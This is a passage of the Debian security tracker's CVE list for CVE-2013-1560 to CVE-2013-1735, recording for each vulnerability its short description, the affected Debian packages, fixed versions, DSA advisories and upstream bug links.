...) {DSA-2762-1 DSA-2759-1} - iceweasel 24.0-1 [squeeze] - iceweasel - icedove 17.0.9-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1735 (Use-after-free vulnerability in the mozilla::layout::ScrollbarActivity ...) {DSA-2762-1 DSA-2759-1} - iceweasel 24.0-1 [squeeze] - iceweasel - icedove 17.0.9-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1734 (Cross-site request forgery (CSRF) vulnerability in attachment.cgi in B ...) - bugzilla (low) [squeeze] - bugzilla (Minor issue) - bugzilla4 (bug #669643) NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=913904 CVE-2013-1733 (Cross-site request forgery (CSRF) vulnerability in process_bug.cgi in ...) - bugzilla (Only affects 4.4) - bugzilla4 (bug #669643) NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=911593 CVE-2013-1732 (Buffer overflow in the nsFloatManager::GetFlowArea function in Mozilla ...) {DSA-2762-1 DSA-2759-1} - iceweasel 24.0-1 [squeeze] - iceweasel - icedove 17.0.9-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1731 (Untrusted search path vulnerability in the GL tracing functionality in ...) - iceweasel (Android-specific) - icedove (Android-specific) - iceape (Android-specific) CVE-2013-1730 (Mozilla Firefox before 24.0, Firefox ESR 17.x before 17.0.9, Thunderbi ...) {DSA-2762-1 DSA-2759-1} - iceweasel 24.0-1 [squeeze] - iceweasel - icedove 17.0.9-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1729 (The WebGL implementation in Mozilla Firefox before 24.0, when NVIDIA g ...) - iceweasel (MacOS-specific) - icedove (MacOS-specific) - iceape (MacOS-specific) CVE-2013-1728 (The IonMonkey JavaScript engine in Mozilla Firefox before 24.0, Thunde ...) - iceweasel 24.0-1 [wheezy] - iceweasel (Only affects Firefox > 17) [squeeze] - iceweasel - icedove (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-1727 (Mozilla Firefox before 24.0 on Android allows attackers to bypass the ...) - iceweasel (Android-specific) - icedove (Android-specific) - iceape (Android-specific) CVE-2013-1726 (Mozilla Updater in Mozilla Firefox before 24.0, Firefox ESR 17.x befor ...) - iceweasel (Updater not used in Debian) - icedove (Updater not used in Debian) - iceape (Updater not used in Debian) CVE-2013-1725 (Mozilla Firefox before 24.0, Firefox ESR 17.x before 17.0.9, Thunderbi ...) {DSA-2762-1 DSA-2759-1} - iceweasel 24.0-1 [squeeze] - iceweasel - icedove 17.0.9-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1724 (Use-after-free vulnerability in the mozilla::dom::HTMLFormElement::IsD ...) - iceweasel 24.0-1 [wheezy] - iceweasel (Only affects Firefox > 17) [squeeze] - iceweasel - icedove (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-1723 (The NativeKey widget in Mozilla Firefox before 24.0, Thunderbird befor ...) - iceweasel 24.0-1 [wheezy] - iceweasel (Only affects Firefox > 17) [squeeze] - iceweasel - icedove (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-1722 (Use-after-free vulnerability in the nsAnimationManager::BuildAnimation ...) {DSA-2762-1 DSA-2759-1} - iceweasel 24.0-1 [squeeze] - iceweasel - icedove 17.0.9-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1721 (Integer overflow in the drawLineLoop function in the libGLESv2 library ...) - iceweasel 24.0-1 [wheezy] - iceweasel (Only affects Firefox > 17) [squeeze] - iceweasel - iceape (Only affects Firefox > 17) CVE-2013-1720 (The nsHtml5TreeBuilder::resetTheInsertionMode function in the HTML5 Tr ...) - iceweasel 24.0-1 [wheezy] - iceweasel (Only affects Firefox > 17) [squeeze] - iceweasel - icedove (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-1719 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel 24.0-1 [wheezy] - iceweasel (Only affects Firefox > 17) [squeeze] - iceweasel - icedove (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-1718 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2762-1 DSA-2759-1} - iceweasel 24.0-1 [squeeze] - iceweasel - icedove 17.0.9-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1717 (Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbi ...) {DSA-2746-1 DSA-2735-1} - iceweasel 17.0.8esr-1 [squeeze] - iceweasel - icedove 17.0.8-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1716 RESERVED CVE-2013-1715 (Multiple untrusted search path vulnerabilities in the (1) full install ...) - iceweasel (Windows-specific) CVE-2013-1714 (The Web Workers implementation in Mozilla Firefox before 23.0, Firefox ...) {DSA-2746-1 DSA-2735-1} - iceweasel 17.0.8esr-1 [squeeze] - iceweasel - icedove 17.0.8-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1713 (Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbi ...) {DSA-2746-1 DSA-2735-1} - iceweasel 17.0.8esr-1 [squeeze] - iceweasel - icedove 17.0.8-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1712 (Multiple untrusted search path vulnerabilities in updater.exe in Mozil ...) - iceweasel (Windows-specific) - icedove (Windows-specific) - iceape (Windows-specific) CVE-2013-1711 (The XrayWrapper implementation in Mozilla Firefox before 23.0 and SeaM ...) - iceweasel (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-1710 (The crypto.generateCRMFRequest function in Mozilla Firefox before 23.0 ...) {DSA-2746-1 DSA-2735-1} - iceweasel 17.0.8esr-1 [squeeze] - iceweasel - icedove 17.0.8-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1709 (Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbi ...) {DSA-2746-1 DSA-2735-1} - iceweasel 17.0.8esr-1 [squeeze] - iceweasel - icedove 17.0.8-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1708 (Mozilla Firefox before 23.0 and SeaMonkey before 2.20 allow remote att ...) - iceweasel (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-1707 (Stack-based buffer overflow in Mozilla Updater in Mozilla Firefox befo ...) - iceweasel (Windows-specific) - icedove (Windows-specific) - iceape (Windows-specific) CVE-2013-1706 (Stack-based buffer overflow in maintenanceservice.exe in the Mozilla M ...) - iceweasel (Windows-specific) - icedove (Windows-specific) - iceape (Windows-specific) CVE-2013-1705 (Heap-based buffer underflow in the cryptojs_interpret_key_gen_type fun ...) - iceweasel 23.0-1 [wheezy] - iceweasel (Only affects Firefox > 17) [squeeze] - iceweasel (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-1704 (Use-after-free vulnerability in the nsINode::GetParentNode function in ...) - iceweasel (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-1703 REJECTED CVE-2013-1702 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel (Only affects Firefox > 17) - icedove (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-1701 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2746-1 DSA-2735-1} - iceweasel 17.0.8esr-1 [squeeze] - iceweasel - icedove 17.0.8-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1700 (The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Wind ...) - iceweasel (Only affects Firefox > 17) CVE-2013-1699 (The Internationalized Domain Name (IDN) display algorithm in Mozilla F ...) - iceweasel (Only affects Firefox > 17) CVE-2013-1698 (The getUserMedia permission implementation in Mozilla Firefox before 2 ...) - iceweasel (Only affects Firefox > 17) CVE-2013-1697 (The XrayWrapper implementation in Mozilla Firefox before 22.0, Firefox ...) {DSA-2720-1 DSA-2716-1} - iceweasel 17.0.7esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1696 (Mozilla Firefox before 22.0 does not properly enforce the X-Frame-Opti ...) - iceweasel (Only affects Firefox > 17) CVE-2013-1695 (Mozilla Firefox before 22.0 does not properly implement certain DocShe ...) - iceweasel (Only affects Firefox > 17) CVE-2013-1694 (The PreserveWrapper implementation in Mozilla Firefox before 22.0, Fir ...) {DSA-2720-1 DSA-2716-1} - iceweasel 17.0.7esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1693 (The SVG filter implementation in Mozilla Firefox before 22.0, Firefox ...) {DSA-2720-1 DSA-2716-1} - iceweasel 17.0.7esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1692 (Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbi ...) {DSA-2720-1 DSA-2716-1} - iceweasel 17.0.7esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1691 RESERVED CVE-2013-1690 (Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbi ...) {DSA-2720-1 DSA-2716-1} - iceweasel 17.0.7esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1689 (Mozilla Firefox 20.0a1 and earlier allows remote attackers to cause a ...) [wheezy] - iceape CVE-2013-1688 (The Profiler implementation in Mozilla Firefox before 22.0 parses untr ...) - iceweasel (Only affects Firefox > 17) CVE-2013-1687 (The System Only Wrapper (SOW) and Chrome Object Wrapper (COW) implemen ...) {DSA-2720-1 DSA-2716-1} - iceweasel 17.0.7esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1686 (Use-after-free vulnerability in the mozilla::ResetDir function in Mozi ...) {DSA-2720-1 DSA-2716-1} - iceweasel 17.0.7esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1685 (Use-after-free vulnerability in the nsIDocument::GetRootElement functi ...) {DSA-2720-1 DSA-2716-1} - iceweasel 17.0.7esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1684 (Use-after-free vulnerability in the mozilla::dom::HTMLMediaElement::Lo ...) {DSA-2720-1 DSA-2716-1} - iceweasel 17.0.7esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1683 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel (Only affects Firefox 21) - icedove (Only affects Firefox 21) - iceape (Only affects Firefox 21) CVE-2013-1682 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2720-1 DSA-2716-1} - iceweasel 17.0.7esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1681 (Use-after-free vulnerability in the nsContentUtils::RemoveScriptBlocke ...) {DSA-2720-1 DSA-2699-1} - iceweasel 17.0.6esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1680 (Use-after-free vulnerability in the nsFrameList::FirstChild function i ...) {DSA-2720-1 DSA-2699-1} [squeeze] - iceweasel - iceweasel 17.0.6esr-1 - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1679 (Use-after-free vulnerability in the mozilla::plugins::child::_geturlno ...) {DSA-2720-1 DSA-2699-1} - iceweasel 17.0.6esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1678 (The _cairo_xlib_surface_add_glyph function in Mozilla Firefox before 2 ...) {DSA-2720-1 DSA-2699-1} - iceweasel 17.0.6esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1677 (The gfxSkipCharsIterator::SetOffsets function in Mozilla Firefox befor ...) {DSA-2720-1 DSA-2699-1} - iceweasel 17.0.6esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1676 (The SelectionIterator::GetNextSegment function in Mozilla Firefox befo ...) {DSA-2720-1 DSA-2699-1} - iceweasel 17.0.6esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1675 (Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbi ...) {DSA-2720-1 DSA-2699-1} - iceweasel 17.0.6esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1674 (Use-after-free vulnerability in Mozilla Firefox before 21.0, Firefox E ...) {DSA-2720-1 DSA-2699-1} - iceweasel 17.0.6esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1673 (The Mozilla Updater in Mozilla Firefox before 21.0 on Windows does not ...) - iceweasel (Windows build only) CVE-2013-1672 (The Mozilla Maintenance Service in Mozilla Firefox before 21.0, Firefo ...) - iceweasel (Windows build only) - icedove (Windows build only) - iceape (Windows build only) CVE-2013-1671 (Mozilla Firefox before 21.0 does not properly implement the INPUT elem ...) - iceweasel (Doesn't affect ESR 17 series, only later versions in experimental) CVE-2013-1670 (The Chrome Object Wrapper (COW) implementation in Mozilla Firefox befo ...) {DSA-2720-1 DSA-2699-1} - iceweasel 17.0.6esr-1 [squeeze] - iceweasel - icedove 17.0.7-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape CVE-2013-1669 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel (Only affects Firefox 20) - icedove (Only affects Firefox 20) - iceape (Only affects Firefox 20) CVE-2013-1668 (The uploadFile function in upload/index.php in CosCMS before 1.822 all ...) NOT-FOR-US: CosCMS CVE-2013-1667 (The rehash mechanism in Perl 5.8.2 through 5.16.x allows context-depen ...) {DSA-2641-1} - perl 5.14.2-19 (bug #702296) NOTE: http://www.nntp.perl.org/group/perl.perl5.porters/2013/03/msg199755.html CVE-2013-1666 (Foswiki before 1.1.8 contains a code injection vulnerability in the MA ...) - foswiki (bug #509864) CVE-2013-1665 (The XML libraries for Python 3.4, 3.3, 3.2, 3.1, 2.7, and 2.6, as used ...) {DSA-2634-1} - keystone 2012.1.1-13 (bug #700948) - python-django 1.4.4-1 CVE-2013-1664 (The XML libraries for Python 3.4, 3.3, 3.2, 3.1, 2.7, and 2.6, as used ...) - keystone 2012.1.1-13 (bug #700948) - nova 2012.1.1-13 (bug #700949) - cinder 2012.2.3-1 (bug #700950) CVE-2013-1663 RESERVED CVE-2013-1662 (vmware-mount in VMware Workstation 8.x and 9.x and VMware Player 4.x a ...) NOT-FOR-US: VMware CVE-2013-1661 (VMware ESXi 4.0 through 5.1, and ESX 4.0 and 4.1, does not properly im ...) NOT-FOR-US: VMware ESXi CVE-2013-1660 REJECTED CVE-2013-1659 (VMware vCenter Server 4.0 before Update 4b, 5.0 before Update 2, and 5 ...) NOT-FOR-US: vCenter CVE-2013-1658 RESERVED CVE-2013-1657 RESERVED CVE-2013-1656 (Spree Commerce 1.0.x through 1.3.2 allows remote authenticated adminis ...) NOT-FOR-US: Spree CVE-2013-1655 (Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, when running Ruby 1 ...) {DSA-2643-1} - puppet 2.7.18-3 CVE-2013-1654 (Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, and Puppet Enterpri ...) {DSA-2643-1} - puppet 2.7.18-3 CVE-2013-1653 (Puppet before 2.6.18, 2.7.x before 2.7.21, and 3.1.x before 3.1.1, and ...) {DSA-2643-1} - puppet 2.7.18-3 CVE-2013-1652 (Puppet before 2.6.18, 2.7.x before 2.7.21, and 3.1.x before 3.1.1, and ...) {DSA-2643-1} - puppet 2.7.18-3 CVE-2013-1651 (OXUpdater in Open-Xchange Server before 6.20.7 rev14, 6.22.0 before re ...) NOT-FOR-US: Open-Xchange CVE-2013-1650 (Open-Xchange Server before 6.20.7 rev14, 6.22.0 before rev13, and 6.22 ...) NOT-FOR-US: Open-Xchange CVE-2013-1649 (Open-Xchange Server before 6.20.7 rev14, 6.22.0 before rev13, and 6.22 ...) NOT-FOR-US: Open-Xchange CVE-2013-1648 (The Subscriptions feature in Open-Xchange Server before 6.20.7 rev14, ...) NOT-FOR-US: Open-Xchange CVE-2013-1647 (Multiple CRLF injection vulnerabilities in Open-Xchange Server before ...) NOT-FOR-US: Open-Xchange CVE-2013-1646 (Multiple cross-site scripting (XSS) vulnerabilities in Open-Xchange Se ...) NOT-FOR-US: Open-Xchange CVE-2013-1645 (Directory traversal vulnerability in Open-Xchange Server before 6.20.7 ...) NOT-FOR-US: Open-Xchange CVE-2013-1644 RESERVED CVE-2013-1643 (The SOAP parser in PHP before 5.3.23 and 5.4.x before 5.4.13 allows re ...) {DSA-2639-1} - php5 5.4.4-14 (bug #702221) NOTE: https://git.php.net/?p=php-src.git;a=commitdiff;h=c737b89473df9dba6742b8fc8fbf6d009bf05c36 CVE-2013-1642 (Multiple cross-site scripting (XSS) vulnerabilities in QuiXplorer befo ...) NOT-FOR-US: QuiXplorer CVE-2013-1641 (Directory traversal vulnerability in the zip download functionality in ...) NOT-FOR-US: QuiXplorer CVE-2013-1640 (The (1) template and (2) inline_template functions in the master serve ...) {DSA-2643-1} - puppet 2.7.18-3 CVE-2013-1639 (Opera before 12.13 does not send CORS preflight requests in all requir ...) NOT-FOR-US: Opera CVE-2013-1638 (Opera before 12.13 allows remote attackers to execute arbitrary code v ...) NOT-FOR-US: Opera CVE-2013-1637 (Opera before 12.13 allows remote attackers to execute arbitrary code v ...) NOT-FOR-US: Opera CVE-2013-1636 (Cross-site scripting (XSS) vulnerability in open-flash-chart.swf in Op ...) - biomaj-watcher 1.2.2-1 (low; bug #742859) [wheezy] - biomaj-watcher (Minor issue) CVE-2013-1635 (ext/soap/soap.c in PHP before 5.3.22 and 5.4.x before 5.4.13 does not ...) {DSA-2639-1} - php5 5.4.4-14 (unimportant; bug #702221) NOTE: open_basedir not supported NOTE: https://git.php.net/?p=php-src.git;a=commitdiff;h=702b436ef470cc02f8e2cc21f2fadeee42103c74 CVE-2013-1634 (A denial of service vulnerability exists in some motherboard implement ...) NOT-FOR-US: Intel CVE-2013-1633 (easy_install in setuptools before 0.7 uses HTTP to retrieve packages f ...) - distribute (unimportant) NOTE: Lack of a security feature, not a vulnerability CVE-2013-1632 RESERVED CVE-2013-1631 (Verax NMS prior to 2.1.0 leaks connection details when any user execut ...) NOT-FOR-US: Verax NMS CVE-2013-1630 (pyshop before 0.7.1 uses HTTP to retrieve packages from the PyPI repos ...) NOT-FOR-US: pyshop CVE-2013-1629 (pip before 1.3 uses HTTP to retrieve packages from the PyPI repository ...) - python-pip 1.3.1-1 (low; bug #710163) [wheezy] - python-pip (Minor issue) [squeeze] - python-pip (Minor issue) - python-virtualenv 1.9.1-1 (medium; bug #710164) [wheezy] - python-virtualenv (Minor issue) [squeeze] - python-virtualenv (Minor issue) CVE-2013-1628 REJECTED CVE-2013-1627 (Absolute path traversal vulnerability in NTWebServer.exe in Indusoft S ...) NOT-FOR-US: Indusoft Studio, Advantech Studio CVE-2013-1626 RESERVED CVE-2013-1625 RESERVED CVE-2013-1624 (The TLS implementation in the Bouncy Castle Java library before 1.48 a ...) - bouncycastle 1.48+dfsg-2 (low; bug #699885) [squeeze] - bouncycastle (Minor issue) [wheezy] - bouncycastle (Minor issue) CVE-2013-1623 (The TLS and DTLS implementations in wolfSSL CyaSSL before 2.5.0 do not ...) {DSA-2780-1} - mysql-5.1 - mysql-5.5 5.5.30+dfsg-1.1 (bug #699886) - cyassl (Fixed before initial upload to archive) NOTE: cyassl: fixed upstream in 2.5.0 CVE-2013-1622 REJECTED CVE-2013-1621 (Array index error in the SSL module in PolarSSL before 1.2.5 might all ...) {DSA-2622-1} - polarssl 1.1.4-2 (bug #699887) CVE-2013-1620 (The TLS implementation in Mozilla Network Security Services (NSS) does ...) - nss 2:3.14.3-1 (low; bug #699888) [squeeze] - nss (Minor issue) CVE-2013-1619 (The TLS implementation in GnuTLS before 2.12.23, 3.0.x before 3.0.28, ...) - gnutls26 2.12.20-4 [squeeze] - gnutls26 (Too intrusive to backport) - gnutls28 3.0.22-3 CVE-2013-1618 (The TLS implementation in Opera before 12.13 does not properly conside ...) NOT-FOR-US: Opera CVE-2013-1617 (Multiple SQL injection vulnerabilities in the management console on th ...) NOT-FOR-US: Symantec CVE-2013-1616 (The management console on the Symantec Web Gateway (SWG) appliance bef ...) NOT-FOR-US: Symantec CVE-2013-1615 (The management console (aka Java console) on the Symantec Security Inf ...) NOT-FOR-US: Symantec CVE-2013-1614 (Multiple cross-site scripting (XSS) vulnerabilities in the management ...) NOT-FOR-US: Symantec CVE-2013-1613 (SQL injection vulnerability in the management console (aka Java consol ...) NOT-FOR-US: Symantec CVE-2013-1612 (Buffer overflow in secars.dll in the management console in Symantec En ...) NOT-FOR-US: Symantec CVE-2013-1611 (Multiple cross-site scripting (XSS) vulnerabilities in administrative- ...) NOT-FOR-US: Symantec Brightmail Gateway CVE-2013-1610 (Unquoted Windows search path vulnerability in RDDService in Symantec P ...) NOT-FOR-US: Symantec CVE-2013-1609 (Multiple unquoted Windows search path vulnerabilities in the (1) File ...) NOT-FOR-US: Symantec CVE-2013-1608 (Directory traversal vulnerability in the Management Console on the Sym ...) NOT-FOR-US: Symantec CVE-2013-1607 (Ruby PDFKit gem prior to 0.5.3 has a Code Execution Vulnerability ...) NOT-FOR-US: Ruby PDFKit gem CVE-2013-1606 (Buffer overflow in the ubnt-streamer RTSP service on the Ubiquiti UBNT ...) NOT-FOR-US: Ubiquiti UBNT AirCam CVE-2013-1605 (Buffer overflow in MayGion IP Cameras with firmware before 2013.04.22 ...) NOT-FOR-US: MayGion IP Cameras CVE-2013-1604 (Directory traversal vulnerability in MayGion IP Cameras with firmware ...) NOT-FOR-US: MayGion IP Cameras CVE-2013-1603 (An Authentication vulnerability exists in D-LINK WCS-1100 1.02, TESCO ...) NOT-FOR-US: D-LINK CVE-2013-1602 (An Information Disclosure vulnerability exists due to insufficient val ...) NOT-FOR-US: D-LINK CVE-2013-1601 (An Information Disclosure vulnerability exists due to a failure to res ...) NOT-FOR-US: D-LINK CVE-2013-1600 (An Authentication Bypass vulnerability exists in upnp/asf-mp4.asf when ...) NOT-FOR-US: D-Link CVE-2013-1599 (A Command Injection vulnerability exists in the /var/www/cgi-bin/rtpd. ...) NOT-FOR-US: D-Link CVE-2013-1598 (A Command Injection vulnerability exists in Vivotek PT7135 IP Cameras ...) NOT-FOR-US: Vivotek PT7135 IP Cameras CVE-2013-1597 (A Directory Traversal vulnerability exists in Vivotek PT7135 IP Camera ...) NOT-FOR-US: Vivotek PT7135 IP Cameras CVE-2013-1596 (An Authentication Bypass Vulnerability exists in Vivotek PT7135 IP Cam ...) NOT-FOR-US: Vivotek PT7135 IP Cameras CVE-2013-1595 (A Buffer Overflow vulnerability exists in Vivotek PT7135 IP Camera 030 ...) NOT-FOR-US: Vivotek PT7135 IP Cameras CVE-2013-1594 (An Information Disclosure vulnerability exists via a GET request in Vi ...) NOT-FOR-US: Vivotek PT7135 IP Cameras CVE-2013-1593 (A Denial of Service vulnerability exists in the WRITE_C function in th ...) NOT-FOR-US: SAP CVE-2013-1592 (A Buffer Overflow vulnerability exists in the Message Server service _ ...) NOT-FOR-US: SAP CVE-2013-1591 (Stack-based buffer overflow in libpixman, as used in Pale Moon before ...) - pixman 0.26.0-4 (bug #700308) [squeeze] - pixman (Vulnerable code not present) CVE-2013-1590 (Buffer overflow in the NTLMSSP dissector in Wireshark 1.6.x before 1.6 ...) {DSA-2625-1} - wireshark 1.8.6-1 [wheezy] - wireshark 1.8.2-5wheezy1 CVE-2013-1589 (Double free vulnerability in epan/proto.c in the dissection engine in ...) - wireshark 1.8.6-1 (unimportant) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Not suitable for code injection CVE-2013-1588 (Multiple buffer overflows in the dissect_pft_fec_detailed function in ...) {DSA-2625-1} - wireshark 1.8.6-1 [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8213 NOTE: Upstream patch: http://anonsvn.wireshark.org/viewvc?view=revision&revision=47098 CVE-2013-1587 (The dissect_rohc_ir_packet function in epan/dissectors/packet-rohc.c i ...) - wireshark 1.8.6-1 [squeeze] - wireshark (Vulnerable code not present) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7679 NOTE: Upstream patch: http://anonsvn.wireshark.org/viewvc?view=revision&revision=44700 CVE-2013-1586 (The fragment_set_tot_len function in epan/reassemble.c in Wireshark 1. ...) {DSA-2625-1} - wireshark 1.8.6-1 [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8111 NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46999 NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=47000 CVE-2013-1585 (epan/tvbuff.c in Wireshark 1.6.x before 1.6.13 and 1.8.x before 1.8.5 ...) - wireshark 1.8.6-1 [squeeze] - wireshark (Vulnerable code not present) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8112 NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46705 NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46678 CVE-2013-1584 (The dissect_version_5_and_6_primary_header function in epan/dissectors ...) - wireshark 1.8.6-1 [squeeze] - wireshark (Vulnerable code not present) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7945 NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46579 CVE-2013-1583 (The dissect_version_4_primary_header function in epan/dissectors/packe ...) - wireshark 1.8.6-1 [squeeze] - wireshark (Vulnerable code not present) [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7945 NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=46577 CVE-2013-1582 (The dissect_clnp function in epan/dissectors/packet-clnp.c in the CLNP ...) {DSA-2625-1} - wireshark 1.8.6-1 [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: Upstream bug: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7871 NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=45646 CVE-2013-1571 (Unspecified vulnerability in the Javadoc component in Oracle Java SE 7 ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-1570 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows re ...) - mysql-5.5 (Only affects MySQL 5.6) - mysql-5.1 (Only affects MySQL 5.6) CVE-2013-1569 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-3187-1 DLA-219-1} - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 - icu 52.1-1 CVE-2013-1568 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-1567 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows re ...) - mysql-5.5 (Only affects MySQL 5.6) - mysql-5.1 (Only affects MySQL 5.6) CVE-2013-1566 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows re ...) - mysql-5.5 (Only affects MySQL 5.6) - mysql-5.1 (Only affects MySQL 5.6) CVE-2013-1565 (Unspecified vulnerability in the Oracle GoldenGate Veridata component ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1564 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1563 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Installation component of Oracle Java doesn't apply to IcedTea/OpenJDK) - openjdk-7 (Installation component of Oracle Java doesn't apply to IcedTea/OpenJDK) CVE-2013-1562 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Financial Services CVE-2013-1561 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1560 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) 